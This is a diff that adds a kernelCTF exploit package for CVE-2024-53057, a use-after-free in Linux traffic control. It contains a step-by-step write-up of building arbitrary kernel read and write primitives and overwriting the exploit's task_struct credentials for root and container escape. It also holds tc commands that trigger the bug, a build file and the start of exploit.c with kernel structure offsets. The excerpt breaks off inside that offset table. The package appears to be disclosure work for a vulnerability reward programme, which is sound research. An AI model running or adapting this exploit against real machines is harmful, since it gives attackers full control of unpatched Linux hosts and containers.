diff --git a/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/docs/exploit.md b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/docs/exploit.md new file mode 100644 index 000000000..d779dc890 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/docs/exploit.md @@ -0,0 +1,303 @@ +# CVE-2024-53057 +## Overview + +The vulnerability allows a use-after-free on a `drr_class` during `drr_dequeue()`. Due to the mitigations, we always replace a freed `drr_class` with another `drr_class`. This is done twice while building a vulnerable qdisc hierarchy. Sending a packet through this hierarchy creates a dangling `rb_node` pointer to the `privdata[]` field of a TBF `Qdisc`. The TBF `Qdisc` is replaced with a netem `Qdisc`, creating a type confusion between `tbf_sched_data` and `netem_sched_data` in `privdata[]`. This lets us read and modify an `rb_node`, granting limited read and write primitives. From there, arbitrary read and write primitives are constructed and used for LPE and container escape by modifying the exploit's `task_struct`. + +## Changes from CVE-2024-45016 Exploit + +This exploit is essentially the same as my [`CVE-2024-45016` exploit](https://github.com/google/security-research/tree/master/pocs/linux/kernelctf/CVE-2024-45016_lts_cos_mitigation). `trigger_vuln()` is updated to use the new vulnerability. This vulnerability can only be triggered on one qdisc per net namespace, so two net namespaces are created for each of the vulnerable hierarchies we need to build and the exploit is updated to switch between these namespaces as needed. + +## Traffic Control Background + +The traffic control subsystem under `net/sched` in the Linux kernel tree is responsible for scheduling, shaping, policing and dropping network traffic. When a packet is sent over a network interface using `sendmsg()` and similar syscalls, it will eventually be enqueued at that interface's root qdisc (queueing discipline) in `dev_queue_xmit()`. Afterwards `qdisc_run()` is called to dequeue packets from the qdisc according to the qdisc's scheduling algorithm. There are many different qdiscs available, all of which are represented by the same `Qdisc` object. The `privdata[]` field of this object stores data specific to the qdisc type. + +Many qdiscs have a child qdisc from which they enqueue and dequeue the packets, resulting in a hierarchy of qdiscs. Some classful qdiscs like DRR or HFSC enqueue each packet to one of a set of user-managed classes, each of which has a child qdisc. These qdiscs allocate an object for each class created (`drr_class` for DRR and `hfsc_class` for HFSC). When a packet is enqueued to one of these classes, it is added to a list of active classes which will be accessed during dequeue. + +The `q.qlen` field of a class's child qdisc counts the number of packets enqueued and determines when to remove the class from the active list. This happens in `qdisc_tree_remove_backlog()` by calling the `qlen_notify` method of the qdisc the class belongs to when the child qdisc's `q.qlen` is changed to zero. A bug which causes an inaccurate `q.qlen` can therefore create a dangling pointer to the class from the active list, leading to a use-after-free on the class during the qdisc's dequeue method. + +Each qdisc has an enqueue and dequeue method defined in its `Qdisc_ops`. If a qdisc has a child qdisc, its enqueue method will usually call the enqueue method of the child and so on until the packet is enqueued at a leaf. Similarly, each dequeue method will try to dequeue from a child qdisc until it finds a packet to dequeue. + +If a qdisc has multiple classes, a filter determines which class the packet is enqueued to. The `basic` filter can be used to send all packets to a chosen class. Some qdiscs like HFSC also have a default class parameter which will be used if there is no filter. +When there is more than one active class , the qdisc's scheduling algorithm will choose which class to dequeue from. The HFSC algorithm will always dequeue packets from an RSC class over an FSC class, providing a deterministic way to control from which class the next packet is dequeued. + +Userspace communicates with the traffic control subsystem through netlink messages. All netlink messages used in the exploit are stored in pre-initialized structs and sent with the custom `tc_*` helper functions. + +## Triggering the Vulnerability + +Calling the `trigger_vuln()` function on a class whose qdisc has handle `0xffff0000` will cause it to remain on its active list when it is eventually freed (`trigger_vuln()` itself does not free the class): + +``` +void trigger_vuln (int parent) { + tc_add_qd(&delay_netem_qdisc_msg, parent, VULN_NETEM_HANDLE); + loopback_send(); +} +``` + +A netem qdisc configured to delay packets is added as the child of `parent` and has a packet enqueued to it. `parent` will remain on its active list as long as the packet is enqueued. When it is deleted, the bug will cause `qdisc_tree_reduce_backlog()` to skip `qlen_notify()` on it and leave it on the active list when it is freed. + +While the class is on the active list, it can be accessed by its qdisc's `dequeue` method, so triggering the vulnerability under a DRR class gives us a use-after-free on a `drr_class` during `drr_dequeue()`. + +## `Qdisc` Use-After-Free + +### Objective + +We want to turn our `drr_class` use-after-free into a use-after-free on the `privdata[]` field of a `Qdisc`, which can be used for type confusion that bypasses the mitigations since we are replacing a `Qdisc` with another `Qdisc` (when working on the exploit, I wasn't aware of the [bypass](https://github.com/google/security-research/blob/master/pocs/linux/kernelctf/CVE-2024-53164_lts_cos_mitigation/docs/exploit.md#additional-notes-for-the-mitigation-instance) that allows a type confusion directly on the class). + +Our use-after-free target is the `watchdog` field of the `tbf_sched_data` struct in a TBF qdisc's `privdata[]`. `watchdog` contains a timer node that is added to a per-CPU RB tree of timers when scheduled by `qdisc_watchdog_schedule_ns()`, which happens in `tbf_dequeue()` when a packet needs to be delayed. This timer is deactivated when the qdisc is destroyed in `__qdisc_destroy()`. If we can schedule it after the qdisc has been destroyed, a dangling pointer will be left to it from the timer tree. + +We can use the vulnerability to call `tbf_dequeue()` on a destroyed TBF qdisc via a dangling pointer to a parent `drr_class`. However `tbf_dequeue()` will only schedule the watchdog timer if it successfully dequeues a packet from the TBF qdisc's child qdisc. Destroying the TBF qdisc purges all packets and it is not possible to enqueue more (the dangling pointer can only be used to dequeue). Therefore we must trigger the vulnerability on a `drr_class` under the TBF qdisc as well. This `drr_class` is freed and replaced with a `drr_class` that remains reachable after the TBF qdisc is destroyed. A packet is enqueued to it normally and dequeued through the dangling pointer. The vulnerability can only be triggered on one qdisc per network namespace, but we can get around this by splitting the hierarchy across two namespaces connected by the dangling pointers. + +After creating the dangling timer node pointer we replace the TBF qdisc with a netem qdisc. Overlapping `netem_sched_data` with `tbf_sched_data` lets us read from and write to the timer node by reading and modifying the netem qdisc’s parameters. + +This demonstrates a way to defeat the mitigations when they are working as intended: use same-object use-after-frees to induce further vulnerabilities until a vulnerability which bypasses the mitigations is reached. There are many bugs for which this will not be possible, for instance some same-object use-after-frees do not lead to any novel behaviour at all. + +### Creating the vulnerable hierarchy + +The `add_qdisc_timer_node()` function creates a dangling timer pointer to a netem qdisc as described above. It constructs the necessary qdisc hierarchy under the passed handle `parent` with an HFSC qdisc with handle `root` at the top and three branches beneath it. The objects in the hierarchy are divided between the `outer` and `inner` namespaces. The root and first and third branches are in the outer namespace while the second branch in the inner namespace. The variables `b1`, `b2`, and `b3` store the handle of each branch's leaf as it is being built. The completed hierarchy is depicted below: + +![Hierarchy diagram](hierarchy.svg) + +The TBF qdisc which we will create a dangling pointer to is located in the second branch. The TBF qdisc's child DRR qdisc has a dangling pointer to a `drr_class` in the third branch, while the first branch contains a DRR qdisc with a dangling pointer to the TBF qdisc's parent `drr_class`. + +We always enqueue packets in the outer namespace. The packets are then enqueued to the third branch due to our choice of filters and the HFSC qdisc's default class parameter and dequeued from the first branch since it is under an RSC class which the HFSC algorithm always prioritizes over FSC classes. + +The dequeue path goes along the two dangling pointers, passing through the TBF qdisc to reach the leaf of branch three where the packet was enqueued. When the packet is passed back up to the TBF qdisc, the timer is scheduled: + +![Enqueue/dequeue paths diagram](paths.svg) + +#### DRR class spray + +While building the hierarchy, we perform a `drr_class` spray in `kmalloc-128` for each dangling `drr_class` pointer we create. After each spray we need to determine which of the sprayed classes is under the dangling pointer. The `drr_spray_and_find()` function sprays `drr_class`s and returns the handle of the successfully sprayed class. + +The successful class is found by sending a packet to each of the sprayed classes. A `basic` filter is used to make each sprayed class the default class in turn. The sent packet will be dequeued via the dangling pointer, so we know we found the right class if the packet we send is successfully recieved back. + +This only works if the packet is enqueued in the outer namespace, which only happens for the `drr_class` under the TBF qdisc. When replacing the other `drr_class` we assume that the first allocation falls under the dangling pointer and retry if this is incorrect (in which case `drr_spray_find()` will fail on the class under the TBF qdisc). We still spray more DRR classes after this to prevent anything else being allocated under the dangling pointer if the first allocation misses. + +Dequeuing the packet will decrement the `q.qlen`s of all qdiscs on the dequeue path. This risks removing their classes from their active lists and preventing further packets being dequeued this way. A second DRR class with handle `pin` is therefore added to the same active list as the first vulnerable class and a packet is sent to it. Then `drr_spray_and_find()` will leave all active lists undisturbed when dequeuing a packet. + +#### Setting the timer + +After the hierarchy is built, we need to send the `stall_tbf_qdisc_msg` netlink message to change the TBF qdisc's `rate` parameter so that the timer will be scheduled during dequeue. This affects the following code which schedules the timer in `tbf_dequeue()`: + +``` +unsigned int len = qdisc_pkt_len(skb); +toks -= (s64) psched_l2t_ns(&q->rate, len); +qdisc_watchdog_schedule_ns(&q->watchdog, now + max_t(long, -toks, -ptoks)); +``` + +When `rate` is `1` the timer will wait for `len - 1` seconds. We want a large waiting time to prevent other timer nodes on the same CPU being added under our node. The `label` argument determines the length of packet and wait. It is converted to a length using the `LABEL_TO_VALUE()` macro. After the TBF qdisc is destroyed via its parent handle `tbfp`, a packet with this length is sent and schedules the TBF timer as shown in the above diagram. + +Unfortunately, on `6.1` kernels the freelist pointer of a TBF qdisc overlaps with the timer's `rb_node`. If the timer is set after the qdisc is freed, the kernel will crash when trying to reallocate the qdisc's memory. Rather than trying to race from another thread, we simply hope that our `sendto()` completes during the RCU delay before the qdisc is freed. A large number of DRR classes are added under the TBF qdisc to increase the delay since their child qdiscs are freed before the TBF qdisc. This is the primary cause of exploit failure against the `6.1` mitigation kernel, causing a crash in about 10% of attempts against the live instance. The `6.6` kernel is not affected. + +#### Netem qdisc spray + +Once the timer is scheduled, `membarrier(MEMBARRIER_CMD_GLOBAL, 0)` is used to wait for the RCU delay before the TBF qdisc is freed and netem discs sprayed in the `kmalloc-1k` cache. The first netem qdisc in the spray is added as the child of `b3` and each subsequent qdisc is added as a child of the previous one. The handles of the sprayed qdiscs are returned via the `spray_handles` array. + +Later in the exploit it will be relevant which bucket in the net device's `qdisc_hash` hash table the netem qdisc is stored in. The hash is calculated from the qdisc's handle. We make sure that all the sprayed netem qdiscs have a handle whose hash matches the passed `spray_hash`. + +### Reading from and writing to `netem_sched_data` + +A netem qdisc's parameters are stored in the `netem_sched_data` struct in its `->privdata[]` and can be read or modified through netlink messages. There are two blocks of contiguous memory inside `netem_sched_data` which consist largely of readable and writable parameters. The first is a 56-byte block starting at `->latency`: + +``` +s64 latency; +s64 jitter; +u32 loss; +u32 ecn; +u32 limit; +u32 counter; +u32 gap; +u32 duplicate; +u32 reorder; +u32 corrupt; +u64 rate; +``` + +Outside of bytes 11 to 15 and 28 to 31, this entire block can be read and modified. Bytes 11 to 15 are the top 5 bytes of `jitter`, which is capped at `INT_MAX`. They can be read but not set to any value greater than `0x000000007f`. Bytes 28 to 31 hold `counter`, which cannot be read or modified through `netem_change()`. + +This block contains the fake `rb_node` under our dangling pointer. The `rb_node` is located at `&latency`, so the only valid value we can write to its `->rb_right` child is `NULL`. Any value can be written to the left child and parent, and all three fields can be arbitrarily read. + +The second block consists of the 40-byte `tc_netem_slot` structure `->slot_config` near the end of `netem_sched_data`: + +``` +__s64 min_delay; +__s64 max_delay; +__s32 max_packets; +__s32 max_bytes; +__s64 dist_delay; +__s64 dist_jitter; +``` + +Writing to `dist_jitter` in bytes 32 to 39 has the same limitation as writing to `jitter`, `max_packets` and `max_bytes` in bytes 16 to 23 can be set to any non-zero value, and all other fields can be arbitrarily set and read. + +We use `write_netem_parms()` and `read_netem_parms()` to send the netlink messages necessary to write or read the parameters of a given netem qdisc. The passed buffers are copied to or from the corresponding parameter blocks as closely as possible. Note that `read_netem_parms()` does not read from the second block of parameters as it is not needed for the exploit. + +Reading is performed by sending an `RTM_GETQDISC` netlink message, which will be recieved by `qdisc_get_notify()` in the kernel. This function builds a diagnostic dump by calling `tc_fill_qdisc()` on each of the net device's qdiscs. We can then read the dump from the netlink socket and locate a specific qdisc's parameters within it. We can write to a netem qdisc's parameters by sending a `RTM_NEWQDISC` message. As long as there is no mismatch in the qdisc type, the specified `Qdisc` will be modified in place by `netem_change()` rather than being reallocated. + +### RB tree rebalancing write primitive + +Deleting an `rb_node` with two children can cause a rebalancing which grants a write primitive when we control the right child. A diagram of the rebalancing is included in the kernel code in `__rb_erase_augmented()`: + +``` +/* + * Case 3: node's successor is leftmost under + * node's right child subtree + * + * (n) (s) + * / \ / \ + * (x) (y) -> (x) (y) + * / / + * (p) (p) + * / / + * (s) (c) + * \ + * (c) + */ +``` + +The address of `p` will be written to the `__rb_parent_color` field of `c` when `p` becomes `c`'s parent. Assuming we control `y`, `p` and `s`, we can write the address of `p` to an arbitrary location specified in the `rb_right` field of `s`. + +Afterwards `s` is the new root of the subtree. If we can remove the subtree's parent, the process can be repeated with `s` taking the place of `y`. + +The least significant bit of an `rb_node`'s `__rb_parent_color` field stores its color. It is `1` if the node is black and `0` if it is red. The above rebalancing always results in `p` being colored black. Prior to commit `b0687c1119b4` coloring was done using the `|` operation, so the value written to `c` would always end in `1`. This is not an issue if we want to write a pointer for a fake structure we control, since we can place the fake structure at a misaligned address. After this commit `+` is used instead, removing this restriction. `6.1` kernels still use `|` and `6.6` kernels use `+`. To ensure the exploit works across all versions, `p` is always located at an even address and the fake object is placed at an offset of 1 from this address. + +## Exploit + +### Qdisc setup + +We will need to trigger the `Qdisc` use-after-free twice during the exploit, so we create four network namespaces in total. We open a netlink and inet socket in each namespace before unsharing to create the next one. After the exploit task enters a new namespace, the old namespace can still be accessed through the sockets opened in it. + +Both of the namespaces have an HFSC qdisc as the root and an FSC class under which `add_qdisc_timer_node()` is called. In the first namespace, this HFSC qdisc is used for the arbitrary write primitive. The HFSC qdisc in the second qdisc is used to hold a packet which we will later use to leak kernel addressses. The handles of the root qdiscs are chosen such that their hashes are distinct from those of the attacker netem qdiscs. + +### RB tree setup + +Each `add_qdisc_timer_node()` call adds an attacker-controlled `rb_node` to the CPU's timer tree. We use this together with `add_timer_node()`, which sets a timer using `timerfd_settime()`, to construct a tree with two attacker-controlled nodes and fifteen regular timer nodes. Each removal of a regular node from the tree will give us a read or write primitive. + +Since the timer tree is shared with all other threads on the CPU, we make the values in our RB nodes as large as possible to lower the chance of interference. To avoid working with these large values in the exploit and writeup, we refer to the nodes using labels from `0` to `16`. The `LABEL_TO_VALUE()` macro converts these labels to the approximate value of the corresponding timer node while preserving their order. + +The `add_order` array determines which value to add at each step. The shape of the tree will vary depending on how many nodes have been added by other threads on the CPU, but the substructure depicted below should be present as long as no timer nodes with values larger than ours are added: + +``` + \ ( ) regular node + (9) < > attacker node +/ \ + (11) + / \ + (13) + / \ + (15) + / \ + <14> <16> +``` + +The nodes with labels `9`, `11`, `13` and `15` will each be removed to trigger an infoleak or write. The parent of `9` should also be under our control, since if it is removed after `9` is removed a crash will occur. To prevent that, we add many timerfd nodes with the label `-1`, shielding the top of the subtree from other threads. + +Once the TBF `Qdiscs`s containing the attacker nodes have been replaced with netem `Qdiscs`s , their node values are longer relevant. The netem qdiscs inserted with labels 14 and 16 are referred to as `n1` and `n2`, respectively. + + +### Leaking `Qdisc` heap addresses + +Removing the parent of the two attacker controlled nodes results in one of them becoming the parent of the other: + +``` + \ \ + (13) (13) +/ \ / \ + (15) --> + / \ / + +``` + +This writes the address of the parent to the child and vice versa. By reading the parameters of all sprayed netem qdiscs and searching for valid kernel addresses, we can determine the handles and addresses on the heap of the two qdiscs which contain timer nodes. + +### Arbitrary read + +A read primitive is obtained by passing a fake `Qdisc` to `tc_fill_qdisc()` when building a qdisc dump. 24 bytes read from the `Qdisc`’s `->stab.szopts` are returned to userspace within the dump. Two rebalancings are are necessary to set up the read primitive. + +#### Rebalancing writes + +In addition to the fake `Qdisc`'s `->stab` at offset 32, we must also provide valid addresses for `->ops` at offset 24 and `->dev_queue` at offset 64 to prevent `tc_fill_qdisc()` from crashing. Overlapping the fake `Qdisc` with `n2->slot` lets us control `->ops` and `->stab` but not `->dev_queue`, which will align with `&n2->slot_dist`. We use the rebalancing write primitive to overwrite `&n2->slot_dist` with the address of a fake `dev_queue`. + +The addresses of the fake nodes corresponding to nodes `y`,`p`,`s`, and `c` in the rebalancing diagram for this write are: + +``` +y,p: &n2->latency +s: &n1->latency + 32 +c: &n2->slot_dist +``` + +The role of `y` and `p` is taken by a single fake node. Its address plus one will be written to `&n2->slot_dist`. + +Another write is needed to insert the fake `Qdisc` into the net device's qdisc hash table so that `qdisc_get_notify()` calls `tc_fill_qdisc()` on it when building a dump. This is done by overwriting `n2->hash.next` with the address of a fake qdisc. + +Due to the limitation of the rebalancing write mentioned above, the fake qdisc linked to by `n2->hash.next` will be at a misaligned offset, limiting which of its fields we can set. Therefore this qdisc will only be used to link to the fake qdisc that is actually used for the read. Here are the `y`,`p`,`s`,`c` addresses for the rebalancing write: + +``` +y: &n1->latency + 32 +p: &n2->latency + 32 +s: &n1->slot + 8 +c: &n2->hash.next +``` + +When `n2->hash.next` is overwritten, all qdiscs after `n2` in the hash bucket become inaccessible. This is why we made sure that any qdiscs we need to access after this point have a hash distinct from `n2`. + +#### Using arbitrary read + +Before each read, the two fake `Qdisc`s have to be written to `n2`'s `privdata[]`. Their values are initialized in `setup_stab_read()` along with the other information needed to perform the read. + +The fake `Qdisc` linked to by `n2->hash.next` has its base at `&n2->latency - 7`. The following fields are set: + +- `flags` is set to `TCQ_F_INVISIBLE` so that this `Qdisc` is skipped during the dump. +- `hash.next` is set to `n2->slot + 32`, linking the `Qdisc` we want to dump. + +The `Qdisc` we want to dump has its base at `&n2->slot - 8`. The following fields have to be set for the read to be successful: + +- `flags` is set to zero. +- `ops` is set to `&n2->latency + 232`, so that `ops->ingress_block_get` and `ops->egress_block_get` are `NULL`, preventing them from being called. +- `stab` is set to the target address. +- `hash.next` is set to `NULL` to stop the dump. +- `dev_queue` has value `&n2->latency + 1` from the earlier rebalancing write. The `dev_queue->dev->ifindex` field will be dumped during `tc_fill_qdisc()`. `dev_queue->dev` is set such that `ifindex` is located at `&n2->latency + 48` and `ifindex` is set to a unique value to identify the fake qdisc in the dump. + +After writing the fake `Qdisc`s to kernel memory, we can use `read_netem_stab()` to dump the net device's qdiscs and find the 24 bytes of leaked data. The `stab_read_8()` function does this and returns 8 bytes read from the passed kernel address. + +### Write-what-where + +The `vttree_get_minvt()` call in `hfsc_dequeue()` provides a write-what-where primitive if we control `hfsc_class`, as described in the [writeup](https://github.com/google/security-research/blob/master/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/docs/exploit.md#write-what-where) for CVE-2023-4623. This primitive allows us to write 8 bytes to an arbitrary address, with the restriction that the written value must be larger (as a `u64`) than the value it is replacing. It can be set up with one rebalancing write. + +#### Rebalancing write + +The rebalancing write primitive is used to replace the root FSC `hfsc_class` of the interface's root qdisc: + +``` +y: &n1->slot + 8 +p: &n1->latency - 16 +s: &n1->latency + 32 +c: &root_qdisc->privdata.root.vt_tree +``` + +This inserts a fake `hfsc_class` into the root qdisc's `vt_tree` with its `vt_node` at `&n1->latency - 15`. There is not enough space in the netem qdisc parameters to fake all the fields necessary for the write primitive, so this `hfsc_class` will only be used to link the `hfsc_class` actually used for the write. + +#### Using write-what-where + +Before each write, a fake `hfsc_class` is placed in `n1->slot_dist`, which is a `disttable` structure consisting of a 4-byte header followed by a buffer of user provided data. It can be reallocated during `netem_change()` with the new contents copied from the `TCA_NETEM_SLOT_DIST` field of the netlink parameters. The `cl_parent` and `cl_vt` fields of this class store the target address and value for the write primitive, respectively. + +The stab read primitive is then used to read the newly allocated `n1->slot_dist`. This lets us calculate the address of the fake `hfsc_class` contained in it, which we then insert into the root qdisc's `vt_tree` by changing the `vt_node->rb_right` field of the `hfsc_class` in `n1`'s parameters. Now `vttree_get_minvt()` will find the fake class we placed in `slot_dist`, assign it to `cl` and execute + +``` +if (cl->cl_parent->cl_cvtmin < cl->cl_vt) + cl->cl_parent->cl_cvtmin = cl->cl_vt; +``` + +on it, writing the 8-byte value in `cl_vt` to the address in `cl_parent`. + +The write primitive is implemented by `vt_write_8()`, which writes `val` to `addr` through the process outlined above. `setup_vt_write()` is called once to store the address and handle of `n1` for `vt_write_8()`. + +### LPE + +With the read and write primitives set up, we escalate privileges by modifying the exploit's `task_struct`. The `task_struct`'s address can be found by reading the following chain of pointers, starting at the `sk_buff` structure in the `t_head` field of `netem_sched_data`: + +`t_head->sk->sock->file->f_owner->pid->tasks[0]` + +Two of these pointers, `t_head` and `f_owner`, have to be manually set. `f_owner` is set by using the `FSETOWN` fcntl on the inet socket. `t_head` is set by enqueueing a delayed packet to a netem qdisc with handle `enq_qd` in the second namespace during qdisc setup. The `handle_to_kaddr()` helper function searches the net device's hash list of qdiscs for this qdisc and returns its address (the address of the net device is obtained by reading `n2->dev_queue->dev`). + +The address of `init_task` is then obtained by repeatedly dereferencing `->parent` starting from the exploit `task_struct`. The exploit `task_struct`'s `->cred` and `->fs` are replaced by `init_cred` and `init_fs` to escalate privileges and escape the mount namespace (the write primitive is guaranteed to work here since `init_cred` and `init_fs` are part of the kernel image, which is at a higher address than the heap). \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/docs/hierarchy.svg b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/docs/hierarchy.svg new file mode 100644 index 000000000..92d0f065b --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/docs/hierarchy.svg @@ -0,0 +1,3 @@ + + +
HFSC
qdisc
root
HFSC...
HFSC
RSC
class
HFSC...
DRR
qdisc
DRR...
DRR
qdisc
DRR...
DRR
class
tbfp
DRR...
DRR
qdisc
DRR...
DRR
class
b3
DRR...
DRR
qdisc
DRR...
HFSC
FSC
class
HFSC...
TBF
qdisc
TBF...
parent
parent
Dangling pointer

Regular pointer

Outer namespace

Inner namespace
Dangling pointer...
\ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/docs/paths.svg b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/docs/paths.svg new file mode 100644 index 000000000..8fc863735 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/docs/paths.svg @@ -0,0 +1,3 @@ + + +
HFSC
qdisc
root
HFSC...
HFSC
RSC
class
HFSC...
DRR
qdisc
DRR...
DRR
qdisc
DRR...
DRR
class
tbfp
DRR...
DRR
qdisc
DRR...
DRR
class
b3
DRR...
DRR
qdisc
DRR...
HFSC
FSC
class
HFSC...
TBF
qdisc
TBF...
Dequeue
Dequeue
Enqueue
Enqueue
Timer set
Timer set
parent
parent
Dangling pointer

Regular pointer

Outer namespace

Inner namespace
Dangling pointer...
\ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/docs/vulnerability.md new file mode 100644 index 000000000..d3cdced0d --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/docs/vulnerability.md @@ -0,0 +1,19 @@ +A vulnerability in the traffic control subsystem can lead to a use-after-free. It is possible to create a non-ingress qdisc with the handle `TC_H_MAJ(TC_H_INGRESS)` (that is `0xffff0000`), which will make `qdisc_tree_reduce_backlog()` assume that it is an ingress qdisc and skip `qlen_notify()` on its classes. This can leave a dangling active list pointer to a class if it is deleted while a packet is enqueued to it. + +To trigger the vulnerability, we create a DRR qdisc with handle `TC_H_MAJ(TC_H_INGRESS)` and one class. A netem qdisc is added as the child of this class and configured to delay packets. A packet is then sent and the DRR class is deleted while it is still enqueued at its child. The bug causes `qlen_notify()` to return without removing the DRR class from its active list. It then remains on the active list after being freed, leading to a use-after-free in `drr_dequeue()`. + +The use-after-free was introduced with commit `066a3b5b2346 ("sch_api: fix qdisc_tree_decrease_qlen() loop")` and fixed with commit `2e95c4384438 ("net/sched: stop qdisc_tree_reduce_backlog on TC_H_ROOT)`. It affected kernel versions `2.6.25` to `6.11.6` + +The vulnerability requires `CAP_NET_ADMIN` and can therefore only be exploited for privilege escalation from a user namespace. The following commands will trigger it and cause a use-after-free: + +``` +ip link set lo up +tc qdisc add dev lo parent root handle ffff: drr +tc filter add dev lo parent ffff: basic classid ffff:1 +tc class add dev lo parent ffff: classid ffff:1 drr +tc qdisc add dev lo parent ffff:1 netem delay 1s +ping -c1 -W0.01 localhost +tc class del dev lo classid ffff:1 +tc class add dev lo parent ffff: classid ffff:1 drr +ping -c1 -W0.01 localhost +``` \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/cos-109-17800.309.59/Makefile b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/cos-109-17800.309.59/Makefile new file mode 100644 index 000000000..8564a1e08 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/cos-109-17800.309.59/Makefile @@ -0,0 +1,7 @@ +CFLAGS = -Wno-incompatible-pointer-types -Wno-format -Wno-address-of-packed-member -static -D COS + +exploit: exploit.c + gcc $(CFLAGS) -o $@ $< + +run: + ./exploit diff --git a/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/cos-109-17800.309.59/exploit b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/cos-109-17800.309.59/exploit new file mode 100644 index 000000000..833b38382 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/cos-109-17800.309.59/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/cos-109-17800.309.59/exploit.c b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/cos-109-17800.309.59/exploit.c new file mode 100644 index 000000000..e3e8e4820 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/cos-109-17800.309.59/exploit.c @@ -0,0 +1,1465 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#if defined(MITIGATION) || defined(COS) + +/* Kernel object offsets */ +#define HANDLE_OFF 56 // offsetof(struct Qdisc, handle) +#define NETDEV_OFF 64 // offsetof(struct Qdisc, dev_queue) +#define PRIVDATA_OFF 384 // offsetof(struct Qdisc, privdata) +#define T_HEAD_OFF 8 // offsetof(struct netem_sched_data, t_head) +#define SLOT_CONFIG_OFF 280 // offsetof(struct netem_sched_data, slot_config) +#define SLOT_DIST_OFF 336 // offsetof(struct netem_sched_data, disttable) +#define TABLE_OFF 4 // offsetof(struct disttable, table) +#define ROOT_OFF 16 // offsetof(struct hfsc_sched, root) +#define LEVEL_OFF 100 // offsetof(struct hfsc_class, level) +#define PARENT_OFF 112 // offsetof (struct hfsc_class, cl_parent) +#define CL_VT_OFF 280 // offsetof(struct hfsc_class, cl_vt) +#define CL_CVTMIN_OFF 312 // offsetof(struct hfsc_class, cl_cvtmin) +#define VT_TREE_OFF 184 // offsetof(struct hfsc_class, vt_tree) +#define VT_NODE_OFF 192 // offsetof(struct hfsc_class, vt_node) +#define ROOT_QDISC_OFF 8 // offsetof(struct netdev_queue, qdisc) +#define NET_DEVICE_OFF 0 // offsetof(struct netdev_queue, dev) +#define QDISC_HASH_TABLE_OFF 968 // offsetof(struct net_device, qdisc_hash) +#define IFINDEX_OFF 216 // offsetof(struct net_device, ifindex) +#define QDISC_HLIST_OFF 40 // offsetof(struct Qdisc, hash) +#define SK_OFF 24 // offsetof(struct sk_buff, sk) +#define SOCK_OFF 624 // offsetof(struct sock, sk_socket) +#define FILE_OFF 16 // offsetof(struct socket, file) +#define F_OWNER_OFF 112 // offsetof(struct file, f_owner) +#define PID_OFF 8 // offsetof(struct fown_struct, pid) +#define TASKS_OFF 16 // offsetof(struct pid, tasks) +#define PID_LINKS_OFF 1632 // offsetof(struct task_struct, pid_links) +#define REAL_PARENT_OFF 1536 // offsetof(struct task_struct, real_parent) +#define CRED_OFF 2008 // offsetof(struct task_struct, cred) +#define FS_OFF 2088 // offsetof(struct task_struct, fs) + +/* Offset of stab in dump message */ +#define STAB_OFF 40 + +/* Offset of fake HFSC class in disttable */ +#define HFSC_CLASS_START 4 + +/* Increases race window */ +#define CLOG_LEN 1000 + +#elif defined(LTS) + +/* Kernel object offsets */ +#define HANDLE_OFF 56 // offsetof(struct Qdisc, handle) +#define NETDEV_OFF 64 // offsetof(struct Qdisc, dev_queue) +#define PRIVDATA_OFF 384 // offsetof(struct Qdisc, privdata) +#define T_HEAD_OFF 8 // offsetof(struct netem_sched_data, t_head) +#define SLOT_CONFIG_OFF 296 // offsetof(struct netem_sched_data, slot_config) +#define SLOT_DIST_OFF 352 // offsetof(struct netem_sched_data, disttable) +#define TABLE_OFF 4 // offsetof(struct disttable, table) +#define ROOT_OFF 16 // offsetof(struct hfsc_sched, root) +#define LEVEL_OFF 96 // offsetof(struct hfsc_class, level) +#define PARENT_OFF 112 // offsetof (struct hfsc_class, cl_parent) +#define CL_VT_OFF 280 // offsetof(struct hfsc_class, cl_vt) +#define CL_CVTMIN_OFF 312 // offsetof(struct hfsc_class, cl_cvtmin) +#define VT_TREE_OFF 184 // offsetof(struct hfsc_class, vt_tree) +#define VT_NODE_OFF 192 // offsetof(struct hfsc_class, vt_node) +#define ROOT_QDISC_OFF 8 // offsetof(struct netdev_queue, qdisc) +#define NET_DEVICE_OFF 0 // offsetof(struct netdev_queue, dev) +#define QDISC_HASH_TABLE_OFF 1032 // offsetof(struct net_device, qdisc_hash) +#define IFINDEX_OFF 224 // offsetof(struct net_device, ifindex) +#define QDISC_HLIST_OFF 40 // offsetof(struct Qdisc, hash) +#define SK_OFF 24 // offsetof(struct sk_buff, sk) +#define SOCK_OFF 624 // offsetof(struct sock, sk_socket) +#define FILE_OFF 16 // offsetof(struct socket, file) +#define F_OWNER_OFF 80 // offsetof(struct file, f_owner) +#define PID_OFF 8 // offsetof(struct fown_struct, pid) +#define TASKS_OFF 16 // offsetof(struct pid, tasks) +#define 